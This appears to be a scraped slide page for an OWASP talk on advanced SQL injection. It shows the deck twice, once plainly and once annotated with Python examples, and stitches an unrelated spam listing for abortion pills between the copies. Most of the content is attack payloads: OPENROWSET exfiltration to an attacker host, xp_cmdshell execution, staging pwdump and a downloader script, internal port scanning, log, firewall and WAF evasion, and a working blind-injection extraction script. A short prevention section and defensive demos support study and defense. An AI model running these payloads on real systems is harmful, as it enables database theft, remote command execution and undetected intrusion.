Advanced SQLi and Evasion Techniques
About Me
Introduction
Damian Profancik | Technical Lead/Security Services Leader @ Apparatus, CISSP
        dprofancik@gmail.com
        @integrisec
Credit
Cesar Cerrudo – CTO, IOActive Labs
   o http://www.appsecinc.com/presentations/Manipulating_SQL_Server_Using_SQL_Injection.pdf

ModSecurity Team – Trustwave SpiderLabs
   o http://blog.spiderlabs.com/2011/07/modsecurity-sql-injection-challenge-lessons-learned.html

Avi Douglen – OWASP Board Member, Israel
   o http://www.comsecglobal.com/framework/Upload/SQL_Smuggling.pdf
SQL Injection Basics
• Dynamic construction of SQL queries
   "SELECT * FROM table WHERE user = '" + uname + "' AND pwd = '" + pword + "'"

• Unsanitized user input
   uname = ' or 1=1--  =>  SELECT * FROM table WHERE user = '' or 1=1--' AND pwd = ''

• Excessive permission
    o Web services running as privileged user with db_owner rights
    o Connecting to database using sa, dbo, or sysadmin accounts
    o Lax file system permissions
Advanced SQLi Techniques
•   Blind SQL Injection
•   Data Exfiltration
•   Privilege Escalation
•   Command Execution
•   Uploading Files
•   Internal DB Server Exploration
•   Port Scanning
•   Firewall Evasion
•   Log Evasion
•   WAF Evasion
Blind SQL Injection
Blind SQL Injection
•   Differential Analysis

    Example:
     http://www.someforum.com/posts.php?id=2
          SELECT author, title, body FROM posts WHERE ID = 2


     http://www.someforum.com/posts.php?id=2 and 1=2
          SELECT author, title, body FROM posts WHERE ID = 2 and 1=2


     http://www.someforum.com/posts.php?id=2 and 1=1
          SELECT author, title, body FROM posts WHERE ID = 2 and 1=1
Blind SQL Injection (cont.)
•   Database Management System Fingerprinting
     o   System Functions
           •   MS SQL Server = getdate()
           •   MySQL = now()
           •   Oracle = sysdate()
           •   Example: http://www.someforum.com/posts.php?id=2 and getdate()=getdate()

     o   String Concatenation
           •   MS SQL Server = +
           •   MySQL = +, CONCAT()
           •   Oracle = ||, CONCAT()
           •   Example: http://www.someforum.com/posts.php?id=2 and 'test'='te'+'st'

     o   Query Chaining
           •   MS SQL Server, MySQL = allows chaining with semicolon
           •   Oracle = does NOT allow chaining with semicolon
           •   Example: http://www.someforum.com/posts.php?id=2; commit --
Blind SQL Injection (cont.)
•   Timing Attacks
     o   Adding delay
           •   SQL Server = WAITFOR DELAY '0:0:10'
           •   MySQL = BENCHMARK(10000000,ENCODE('MSG','by 10 seconds'))
           •   PostgreSQL = pg_sleep(10)
           •   Oracle = Union with query that contains a lot of results
     o   SELECT IF(condition, true, false)

    Example:
    …1 UNION SELECT IF(SUBSTRING(password,1,1) = CHAR(50),BENCHMARK(10000000,ENCODE('MSG','by 10 seconds')),null) FROM users WHERE userid = 1;
Attacking MS SQL Server
Linked and Remote Servers
•   OPENROWSET

    Example:
    SELECT * FROM OPENROWSET('SQLOLEDB',
                             'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
                             'SELECT * FROM table')

•   OPENDATASOURCE

    Example:
    SELECT * FROM OPENDATASOURCE('SQLOLEDB',
                                 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;')
                                 .DatabaseName.dbo.TableName
Data Exfiltration
•   Remote server INSERT

    Example:
    INSERT INTO OPENROWSET('SQLOLEDB',
                               'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
                               'SELECT * FROM table1')
                               SELECT * FROM table2
Data Exfiltration (cont.)
  INSERT INTO OPENROWSET('SQLOLEDB',
                               'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
                               'SELECT * FROM _sysdatabases')
                               SELECT * FROM master.dbo.sysdatabases


  INSERT INTO OPENROWSET('SQLOLEDB',
                               'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
                               'SELECT * FROM _sysobjects ')
                               SELECT * FROM databasename.dbo.sysobjects


  INSERT INTO OPENROWSET('SQLOLEDB',
                               'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
                               'SELECT * FROM _syscolumns')
                               SELECT * FROM databasename.dbo.syscolumns
Data Exfiltration (cont.)
  INSERT INTO OPENROWSET('SQLOLEDB',
                               'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
                               'SELECT * FROM table1')
                               SELECT * FROM databasename..table1


  INSERT INTO OPENROWSET('SQLOLEDB',
                               'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
                               'SELECT * FROM table2')
                               SELECT * FROM databasename..table2


  INSERT INTO OPENROWSET('SQLOLEDB',
                               'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
                               'SELECT * FROM _sysxlogins')
                               SELECT * FROM databasename.dbo.sysxlogins
Privilege Escalation
•   Known vulnerabilities

    Example:
    SQL injection vulnerability in the RESTORE DATABASE command that can lead to privilege escalation
    Team SHATTER - 4/12/2012 - http://packetstormsecurity.org/files/111788/shatter-sqlserver.txt


•   Often not required
    o   Connection strings using SA, dbo, sysadmin
    o   Web service context
Command Execution
 Example:
 INSERT INTO OPENROWSET('SQLOLEDB',
                            'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
                            'SELECT * FROM temp_table')
                            EXEC master.dbo.xp_cmdshell 'dir'
Uploading Files
On attacker’s server…
1.   CREATE TABLE AttackerTable (data text)

2.   BULK INSERT AttackerTable FROM 'pwdump.exe' WITH (codepage='RAW')

On victim’s server…
3.   EXEC xp_cmdshell 'bcp "SELECT * FROM AttackerTable" queryout pwdump.exe -c -Craw -SAttackersIP -Usa -Ppwn3d'

4.   EXEC xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\MSSQLServer\Client\ConnectTo','AttackersAlias','REG_SZ','DBMSSOCN,AttackersIP,80'

5.   EXEC xp_cmdshell 'bcp "SELECT * FROM AttackerTable" queryout pwdump.exe -c -Craw -SAttackersAlias -Usa -Ppwn3d'
Uploading Files (cont.)
  INSERT INTO OPENROWSET('SQLOLEDB',
                             'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
                             'SELECT * FROM temp_table')
                             EXEC xp_cmdshell '"first script line" >> script.vbs'


                             …
                             EXEC xp_cmdshell '"second script line" >> script.vbs'
                             ...
                             EXEC xp_cmdshell '"last script line" >> script.vbs'
                             EXEC xp_cmdshell 'script.vbs' ==> execute script to download binary
Internal DB Server Exploration
•    Linked and Remote Servers

1.   INSERT INTO OPENROWSET('SQLOLEDB',
                                     'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
                                     'SELECT * FROM _sysservers')
                                      SELECT * FROM master.dbo.sysservers

2.   INSERT INTO OPENROWSET('SQLOLEDB',
                                     'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
                                     'SELECT * FROM _sysservers')
                                      SELECT * FROM linkedserver1.master.dbo.sysservers

3.   INSERT INTO OPENROWSET('SQLOLEDB',
                                     'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
                                     'SELECT * FROM _sysdatabases')
                                      SELECT * FROM linkedserver1.master.dbo.sysdatabases
4.   Rinse and repeat…
Port Scanning
  Example:
  SELECT * FROM OPENROWSET('SQLOLEDB',
                            'uid=sa;pwd=;Network=DBMSSOCN;Address=192.168.1.1,80;timeout=5',
                            'SELECT * FROM table')
Evasion Techniques
Firewall Evasion
•   Use port 80 for outbound

    Example:
    INSERT INTO OPENROWSET('SQLOLEDB',
                               'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,80;',
                               'SELECT * FROM table1')
                               SELECT * FROM table2
Log Evasion
•   Inject using POST parameters


•   Long HTTP requests
     o   IIS truncates requests longer than 4097 characters
     o   Sun-One Application Server truncates at 4092 characters


     Example:
     http://www.someforum.com/posts.php?param=<4097 x 'a'>&id=2 or 1=1--
WAF Evasion
•   Comments
     o   # = single line comment
     o   -- = single line comment
     o   /* */ = inline, multi-line comment
     o   /*! */ = MySQL-specific inline, multi-line comment

    Example:
     http://www.someforum.com/posts.php?id=2 UN/**/ION SEL/**/ECT * FROM…


•   New line
     o   %0D%0A = URL-encoded newline
     o   %0B = URL-encoded vertical separator

    Example:
     http://www.someforum.com/posts.php?id=2 UNION%0D%0ASELECT * FROM…
WAF Evasion (cont.)
•   Character Encoding
     o   Unicode (U+02BC = ʼ)
     o   CHAR()
     o   Hexadecimal
     o   URL-encoding
     o   Double Encoding


    Example:
     Double Encoding:
           URL = http://www.someforum.com/posts.php?id=2 UN%252f%252a%252a%252fION SEL%252f%252a%252a%252fECT * FROM…
           WAF = http://www.someforum.com/posts.php?id=2 UN%2f%2a%2a%2fION SEL%2f%2a%2a%2fECT * FROM…
           Result = http://www.someforum.com/posts.php?id=2 UN/**/ION SEL/**/ECT * FROM…
WAF Evasion (cont.)
•   Concatenation
     o   EXEC()
     o   Split/Join
     o   Special Characters (i.e. '*', '+', '%', etc.)

    Example:
     Split/Join:
            URL = http://www.someforum.com/posts.php?id=SELECT name&id=password FROM users
            WAF = id=SELECT name
                   id=password FROM users
            ASP/ASP.Net = id=SELECT name,password FROM users

     Special Characters:
           URL = http://www.someforum.com/posts.php?id=SEL%ECT name,password FR%OM users
           WAF = id=SEL%ECT name,password FR%OM users
           ASP/ASP.Net = id=SELECT name,password FROM users
SQL Injection Prevention
SQLi Prevention
•   Sanitize User Input
     o   Normalize Input
     o   Whitelists
     o   Built-in Functions
     o   Regular Expressions
     o   Trust NO data source (i.e. Cookies, Referer, User-Agent, etc.)
•   Prepared Statements/Parameterized Queries
•   Stored Procedures
•   Accounts with Least Privilege
•   Enable DisallowAdhocAccess registry setting for MS SQL Server
•   Perform Self Assessments
•   Use a Web Application Firewall
•   Filter Outbound Traffic at Firewall
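To tie the prevention list back to the "SQL Injection Basics" slide, here is an added Python example (not from the deck) that builds the same login query two ways, by string concatenation and with parameters, and adds an allowlist check for the posts.php?id= case from the blind-injection slides. It uses an in-memory SQLite database with constructed rows; the table layout and sample accounts are assumptions for this illustration only.

```python
import re
import sqlite3

# Constructed sample schema and rows (not from the original slides).
SCHEMA = """
CREATE TABLE users (user TEXT, pwd TEXT, role TEXT);
INSERT INTO users VALUES ('alice', 's3cret', 'admin');
INSERT INTO users VALUES ('bob',   'hunter2', 'user');
CREATE TABLE posts (id INTEGER PRIMARY KEY, author TEXT, title TEXT, body TEXT);
INSERT INTO posts VALUES (1, 'alice', 'Hello', 'first post');
INSERT INTO posts VALUES (2, 'bob',   'Re: Hello', 'second post');
"""


def connect():
    """In-memory SQLite database seeded with the constructed sample data."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def login_dynamic(conn, uname, pword):
    """Vulnerable: the query is built by string concatenation, the same
    pattern as on the 'SQL Injection Basics' slide. Returns matched rows."""
    sql = ("SELECT user, role FROM users WHERE user = '" + uname
           + "' AND pwd = '" + pword + "'")
    return conn.execute(sql).fetchall()


def login_parameterized(conn, uname, pword):
    """Hardened: placeholders send the values separately from the SQL text,
    so a quote or comment sequence in uname can never change the query."""
    sql = "SELECT user, role FROM users WHERE user = ? AND pwd = ?"
    return conn.execute(sql, (uname, pword)).fetchall()


# Allowlist for the id parameter: a plain integer and nothing else.
ID_ALLOWLIST = re.compile(r"^[0-9]{1,9}$")


def fetch_post(conn, id_param):
    """Allowlist validation plus parameterization for the posts.php?id= case:
    anything that is not a plain integer (e.g. '2 and 1=1') is rejected
    before it reaches the database."""
    if not ID_ALLOWLIST.match(id_param):
        raise ValueError("rejected non-numeric id parameter: %r" % id_param)
    sql = "SELECT author, title, body FROM posts WHERE id = ?"
    return conn.execute(sql, (int(id_param),)).fetchone()


if __name__ == "__main__":
    db = connect()
    payload = "' or 1=1--"          # the uname from the basics slide
    print("dynamic query, payload :", login_dynamic(db, payload, ""))
    print("parameterized, payload :", login_parameterized(db, payload, ""))
    print("parameterized, valid   :", login_parameterized(db, "bob", "hunter2"))
    print("post id=2              :", fetch_post(db, "2"))
    try:
        fetch_post(db, "2 and 1=1")
    except ValueError as err:
        print("post id='2 and 1=1'    :", err)
```

The dynamic version returns every user for the empty password because the injected `--` comments out the `AND pwd = ''` clause; the parameterized version returns nothing for the same input.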
Q&A

 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
🐬 The future of MySQL is Postgres 🐘
🐬  The future of MySQL is Postgres   🐘🐬  The future of MySQL is Postgres   🐘
🐬 The future of MySQL is Postgres 🐘
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
 

Owasp Indy Q2 2012 Advanced SQLi

Blind SQL Injection (cont.)
•   Database Management System Fingerprinting
     o   System Functions
           •   MS SQL Server = getdate()
           •   MySQL = now()
           •   Oracle = sysdate()
           •   Example: http://www.someforum.com/posts.php?id=2 and getdate()=getdate()
               The page renders normally only when the back end is SQL Server; on any other engine the unknown function is an error.
     o   String Concatenation
           •   MS SQL Server = +
           •   MySQL = CONCAT(), or || only when sql_mode contains PIPES_AS_CONCAT; + is numeric addition in MySQL
           •   Oracle = ||, CONCAT()
           •   Example: http://www.someforum.com/posts.php?id=2 and 'test'='te'+'st'
               Caveat: MySQL silently coerces both sides of this comparison to 0, so it also evaluates true there. The getdate()/now()/sysdate() probe is the reliable discriminator; the concatenation probe confirms SQL Server only once the others have been ruled out.
     o   Query Chaining (stacked queries)
           •   MS SQL Server = allows chaining with semicolon
           •   MySQL = allows chaining only when the client API sends multiple statements (e.g. mysqli_multi_query()); the common PHP mysql_query() path does not
           •   Oracle = does NOT allow chaining with semicolon
           •   Example: http://www.someforum.com/posts.php?id=2; commit --
Blind SQL Injection (cont.)
•   Timing Attacks
     o   Adding delay
           •   SQL Server = WAITFOR DELAY '0:0:10'
           •   MySQL = SLEEP(10) on 5.0.12 and later; BENCHMARK(10000000,ENCODE('MSG','by 10 seconds')) on older versions (BENCHMARK is CPU-bound, so calibrate the iteration count against the target before trusting the delay)
           •   PostgreSQL = pg_sleep(10)
           •   Oracle = UNION with a query that returns a lot of rows (heavy query), or DBMS_PIPE.RECEIVE_MESSAGE('x',10) where the injected user may execute it
     o   Conditional delay: IF(condition, true_branch, false_branch)
         Example (MySQL):
         …1 UNION SELECT IF(SUBSTRING(password,1,1) = CHAR(50),BENCHMARK(10000000,ENCODE('MSG','by 10 seconds')),null) FROM users WHERE userid = 1;
         CHAR(50) is '2': the response is delayed only when the first character of the password is '2'. Repeat for each position and each candidate character, measuring response time instead of page content.
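The three Blind SQL Injection slides above describe the pieces (a true/false oracle from differential analysis, fingerprinting, a delay for the timing variant) but not the loop that turns the oracle into data. This added example, written for this page and not taken from the slides, shows that loop end to end. The forum is simulated: vulnerable_posts_endpoint() builds its query by string concatenation against an in-memory SQLite database, the same defect as posts.php?id= on the slides; the schema, the users table and the password 's3cret!' are constructed test data. Only oracle() knows anything about the target; extract_string() is the generic search any blind-injection tool runs, and for the timing variant oracle() would measure response time instead of response content while the search stays the same.

```python
"""Blind (boolean-based) SQL injection driven to full data extraction.

Simulated target: the query is assembled by string concatenation against an
in-memory SQLite database (constructed test data, not a real system).
"""
import sqlite3


def build_db():
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE posts(id INTEGER, author TEXT, title TEXT, body TEXT);
        CREATE TABLE users(userid INTEGER, name TEXT, password TEXT);
        INSERT INTO posts VALUES (2, 'alice', 'Hello', 'first post');
        INSERT INTO users VALUES (1, 'admin', 's3cret!');
        """
    )
    return db


def vulnerable_posts_endpoint(db, id_param):
    """posts.php?id=<id_param>: the parameter is pasted into the SQL text."""
    sql = "SELECT author, title, body FROM posts WHERE id = " + id_param
    try:
        return db.execute(sql).fetchall()
    except sqlite3.Error:
        return []  # generic error page; the attacker reads it as 'false'


def oracle(db, condition):
    """Differential analysis: post 2 is shown only when the injected
    condition is true. Response content is the only signal used."""
    return len(vulnerable_posts_endpoint(db, "2 AND (" + condition + ")")) > 0


def extract_string(db, subquery, max_len=64):
    """Recover the single string returned by `subquery`, one character per
    position, binary-searching the code point in 32..126 (about 7 requests
    per character instead of one request per candidate character)."""
    result = ""
    for pos in range(1, max_len + 1):
        if not oracle(db, "length((%s)) >= %d" % (subquery, pos)):
            break  # past the end of the value
        char_code = "unicode(substr((%s), %d, 1))" % (subquery, pos)
        lo, hi = 32, 126
        while lo < hi:  # invariant: the real code point lies in [lo, hi]
            mid = (lo + hi) // 2
            if oracle(db, "%s > %d" % (char_code, mid)):
                lo = mid + 1
            else:
                hi = mid
        result += chr(lo)
    return result


def recover_admin_password():
    db = build_db()
    # The slide's two sanity probes: 1=1 keeps the post, 1=2 removes it.
    assert oracle(db, "1=1") and not oracle(db, "1=2")
    return extract_string(db, "SELECT password FROM users WHERE userid = 1")


if __name__ == "__main__":
    print(recover_admin_password())
```

Against a real target the request count is what gets noticed: seven requests per character, so a 32-character hash costs a few hundred requests, each carrying an injected length()/substr()/unicode() expression that a detection rule can key on.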
Linked and Remote Servers
•   OPENROWSET (requires ad hoc distributed queries to be enabled: the DisallowAdhocAccess registry setting on SQL Server 2000, sp_configure 'Ad Hoc Distributed Queries' on 2005 and later)
    Example:
    SELECT * FROM OPENROWSET(
        'SQLOLEDB',
        'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
        'SELECT * FROM table'
    )
•   OPENDATASOURCE
    Example:
    SELECT * FROM OPENDATASOURCE(
        'SQLOLEDB',
        'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;'
    ).DatabaseName.dbo.TableName
    Both make the victim's database server open an outbound connection to attackersip using credentials the attacker chose; the victim's own login only has to be allowed to run the function.
Data Exfiltration
•   Remote server INSERT: INSERT INTO OPENROWSET(...) SELECT ... pushes the result set of any query the victim can run into a table on the attacker's server. The attacker's receiving table (named with a leading underscore below) must already exist with a column layout matching the SELECT.
    Example:
    INSERT INTO OPENROWSET('SQLOLEDB',
        'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
        'SELECT * FROM table1')
    SELECT * FROM table2

Data Exfiltration (cont.)
•   Enumerate databases, then objects, then columns:
    INSERT INTO OPENROWSET('SQLOLEDB',
        'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
        'SELECT * FROM _sysdatabases')
    SELECT * FROM master.dbo.sysdatabases

    INSERT INTO OPENROWSET('SQLOLEDB',
        'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
        'SELECT * FROM _sysobjects')
    SELECT * FROM databasename.dbo.sysobjects

    INSERT INTO OPENROWSET('SQLOLEDB',
        'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
        'SELECT * FROM _syscolumns')
    SELECT * FROM databasename.dbo.syscolumns

Data Exfiltration (cont.)
•   Pull the tables of interest, then the login hashes:
    INSERT INTO OPENROWSET('SQLOLEDB',
        'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
        'SELECT * FROM table1')
    SELECT * FROM databasename..table1

    INSERT INTO OPENROWSET('SQLOLEDB',
        'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
        'SELECT * FROM table2')
    SELECT * FROM databasename..table2

    INSERT INTO OPENROWSET('SQLOLEDB',
        'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
        'SELECT * FROM _sysxlogins')
    SELECT * FROM master.dbo.sysxlogins
    sysxlogins lives in master on SQL Server 2000 (not in the application database); on 2005 and later the password hashes are in sys.sql_logins.
Privilege Escalation
•   Known vulnerabilities
    Example: SQL injection vulnerability in the RESTORE DATABASE command that can lead to privilege escalation
    Team SHATTER - 4/12/2012 - http://packetstormsecurity.org/files/111788/shatter-sqlserver.txt
•   Often not required
     o   Connection strings using sa, dbo or a sysadmin login
     o   Web service context: the application's own database login already holds more rights than the attacker needs
Command Execution
Example:
INSERT INTO OPENROWSET('SQLOLEDB',
    'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
    'SELECT * FROM temp_table')
EXEC master.dbo.xp_cmdshell 'dir'
INSERT ... EXEC captures the rows xp_cmdshell returns (one text column) and ships them to temp_table on the attacker's server, so the command output comes back even though the injection itself is blind. xp_cmdshell requires sysadmin (or a configured proxy account) and, on SQL Server 2005 and later, has to be enabled with sp_configure first; it is off by default there.
Uploading Files
On attacker's server…
1. CREATE TABLE AttackerTable (data text)
2. BULK INSERT AttackerTable FROM 'pwdump.exe' WITH (codepage='RAW')
On victim's server…
3. EXEC xp_cmdshell 'bcp "SELECT * FROM AttackerTable" queryout pwdump.exe -c -Craw -SAttackersIP -Usa -Ppwn3d'
4. If outbound 1433 is blocked, register a client alias that reaches the attacker's server on port 80:
   EXEC xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\MSSQLServer\Client\ConnectTo','AttackersAlias','REG_SZ','DBMSSOCN,AttackersIP,80'
5. EXEC xp_cmdshell 'bcp "SELECT * FROM AttackerTable" queryout pwdump.exe -c -Craw -SAttackersAlias -Usa -Ppwn3d'
bcp on the victim pulls the binary back out of the table as raw bytes and writes it to disk; xp_regwrite, like xp_cmdshell, requires sysadmin.
Uploading Files (cont.)
•   Without an attacker-side SQL Server to bcp from, write a downloader script one line at a time through xp_cmdshell, then run it:
    INSERT INTO OPENROWSET('SQLOLEDB',
        'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
        'SELECT * FROM temp_table')
    EXEC xp_cmdshell 'echo first script line >> script.vbs'
    …
    EXEC xp_cmdshell 'echo second script line >> script.vbs'
    …
    EXEC xp_cmdshell 'echo last script line >> script.vbs'
    EXEC xp_cmdshell 'script.vbs'   ==> execute script to download binary
    Each echo appends one line to the file; characters cmd.exe treats specially (<, >, &, |) have to be escaped with ^ inside the script lines.
Internal DB Server Exploration
•   Linked and Remote Servers: sysservers lists every linked server a host knows about, so each hop reveals the next
    1. INSERT INTO OPENROWSET('SQLOLEDB',
           'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
           'SELECT * FROM _sysservers')
       SELECT * FROM master.dbo.sysservers
    2. INSERT INTO OPENROWSET('SQLOLEDB',
           'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
           'SELECT * FROM _sysservers')
       SELECT * FROM linkedserver1.master.dbo.sysservers
    3. INSERT INTO OPENROWSET('SQLOLEDB',
           'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
           'SELECT * FROM _sysdatabases')
       SELECT * FROM linkedserver1.master.dbo.sysdatabases
    4. Rinse and repeat…
Port Scanning
Example:
SELECT * FROM OPENROWSET('SQLOLEDB',
    'uid=sa;pwd=;Network=DBMSSOCN;Address=192.168.1.1,80;timeout=5',
    'SELECT * FROM table')
Vary the host and port in Address and read the outcome: a closed port fails quickly with a connection error, a filtered port runs out the timeout, and an open port that is not SQL Server fails differently again. Both the error text and the response time leak the port state, so the scan works even when the injection is blind.
Firewall Evasion
•   Use port 80 for outbound: the attacker's SQL Server listens on 80 (or 443), which egress filters almost always allow
    Example:
    INSERT INTO OPENROWSET('SQLOLEDB',
        'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,80;',
        'SELECT * FROM table1')
    SELECT * FROM table2
Log Evasion
•   Inject using POST parameters: default web server access logs record the URL and query string, not the request body
•   Long HTTP requests: the request is processed in full, but the logged line is cut short, so a payload placed after enough padding never appears in the log
     o   IIS truncates logged requests longer than 4097 characters
     o   Sun-One Application Server truncates at 4092 characters
     Example: http://www.someforum.com/posts.php?param=<4097 x 'a'>&id=2 or 1=1--
WAF Evasion
•   Comments
     o   # = single line comment (MySQL only)
     o   -- = single line comment (MySQL requires whitespace after the dashes)
     o   /* */ = inline, multi-line comment
     o   /*! */ = MySQL-specific conditional comment: MySQL executes its contents, other engines ignore them
     Example: http://www.someforum.com/posts.php?id=2 UN/**/ION SEL/**/ECT * FROM…
     Caveat: whether a comment inside a keyword is tolerated varies by engine and version; a comment between keywords (UNION/**/SELECT) is accepted by every engine that supports /* */ and defeats the same space-based signatures.
•   New line
     o   %0D%0A = URL-encoded CR LF
     o   %0B = URL-encoded vertical tab
     Example: http://www.someforum.com/posts.php?id=2 UNION%0D%0ASELECT * FROM…
WAF Evasion (cont.)
•   Character Encoding
     o   Unicode (U+02BC = ʼ: when the application later converts to a single-byte code page, best-fit mapping turns the modifier letter apostrophe into a plain ' that the WAF never saw)
     o   CHAR()
     o   Hexadecimal
     o   URL-encoding
     o   Double Encoding: the WAF decodes once and sees harmless %2f%2a sequences; the application decodes again before building the query
     Example (Double Encoding):
     URL    = http://www.someforum.com/posts.php?id=2 UN%252f%252a%252a%252fION SEL%252f%252a%252a%252fECT * FROM…
     WAF    = http://www.someforum.com/posts.php?id=2 UN%2f%2a%2a%2fION SEL%2f%2a%2a%2fECT * FROM…
     Result = http://www.someforum.com/posts.php?id=2 UN/**/ION SEL/**/ECT * FROM…
WAF Evasion (cont.)
•   Concatenation
     o   EXEC() of a string assembled at runtime
     o   Split/Join (HTTP parameter pollution)
     o   Special Characters (i.e. '*', '+', '%', etc.)
     Example (Split/Join): ASP and ASP.NET join duplicate parameter names with a comma, so a WAF that inspects each value on its own never sees a complete statement
     URL         = http://www.someforum.com/posts.php?id=SELECT name&id=password FROM users
     WAF         = id=SELECT name        id=password FROM users
     ASP/ASP.Net = id=SELECT name,password FROM users
     Example (Special Characters): the WAF signature sees broken keywords, while ASP/ASP.NET discards a '%' that does not start a valid escape sequence
     URL         = http://www.someforum.com/posts.php?id=SEL%ECT name,password FR%OM users
     WAF         = id=SEL%ECT name,password FR%OM users
     ASP/ASP.Net = id=SELECT name,password FROM users
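The three WAF Evasion slides list the tricks; what a defender needs to see is why each one works and what closes all of them at once. This added example, written for this page rather than taken from the slides or from any WAF product, runs a deliberately naive signature rule and a normalizing rule over the same constructed query strings. The back-end behaviour it models is an assumption of the simulation: duplicate parameters joined with ',' as ASP/ASP.NET does, a second URL-decode in the application, and /* */ comments and control characters treated as whitespace by the DBMS. The split/join payload combines the comma join with a comment spanning the two values, so the comma itself is swallowed.

```python
"""Naive signature WAF beside a normalizing one, over constructed payloads.

The back-end behaviour (comma join of duplicate parameters, second decode,
comments-as-whitespace) is assumed for the simulation, not measured.
"""
import re
from urllib.parse import parse_qs, unquote

# The signature a hurried rule author writes: keyword, one literal space, keyword.
SIGNATURE = re.compile(r"union select", re.IGNORECASE)

# Constructed attack strings, one per evasion technique on the slides.
PAYLOADS = {
    "plain":           "id=2 UNION SELECT name,password FROM users",
    "inline_comment":  "id=2 UNION/**/SELECT name,password FROM users",
    "newline":         "id=2 UNION%0D%0ASELECT name,password FROM users",
    "vertical_tab":    "id=2 UNION%0BSELECT name,password FROM users",
    "double_encoding": "id=2 UNION%252f%252a%252a%252fSELECT name,password FROM users",
    # Parameter pollution plus a comment spanning both values: the back end
    # joins them as "2 UNION/*,*/SELECT ..." and the comment eats the comma.
    "split_join":      "id=2 UNION/*&id=*/SELECT name,password FROM users",
    "benign":          "id=2",
}


def param_values(raw_query):
    """One URL-decode, split into name -> [values], as most WAFs see a request."""
    return parse_qs(raw_query, keep_blank_values=True)


def naive_waf_blocks(raw_query):
    """Match the signature against each decoded parameter value in isolation."""
    return any(SIGNATURE.search(v)
               for values in param_values(raw_query).values() for v in values)


def normalize(value):
    """Reduce a value to the form the DBMS will effectively parse."""
    previous = None
    while value != previous:                     # peel off every layer of %-encoding
        previous, value = value, unquote(value)
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)   # comments act as whitespace
    return re.sub(r"\s+", " ", value)            # CR, LF, vertical tab, tabs -> one space


def normalizing_waf_blocks(raw_query):
    """Inspect each value AND the view the back end builds from duplicate names."""
    params = param_values(raw_query)
    views = [v for values in params.values() for v in values]
    views += [",".join(values) for values in params.values()]  # ASP/ASP.NET join
    return any(SIGNATURE.search(normalize(v)) for v in views)


def compare():
    """Return {payload name: (naive blocks it?, normalizing blocks it?)}."""
    return {name: (naive_waf_blocks(q), normalizing_waf_blocks(q))
            for name, q in PAYLOADS.items()}


if __name__ == "__main__":
    for name, (naive, normalized) in compare().items():
        print("%-16s naive=%-5s normalizing=%s" % (name, naive, normalized))
```

The point is not the particular regex: every bypass on the slides attacks the gap between what the WAF matches on and what the database finally parses, so the rule engine has to be fed the same canonical form the application and the DBMS will see (fully decoded, comments stripped, duplicate parameters joined the way the framework joins them) before any signature is applied.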
SQLi Prevention
•   Prepared Statements/Parameterized Queries: the primary defense; user data is bound as values and can never change the structure of the statement
•   Validate User Input (defense in depth, not a substitute for parameterization)
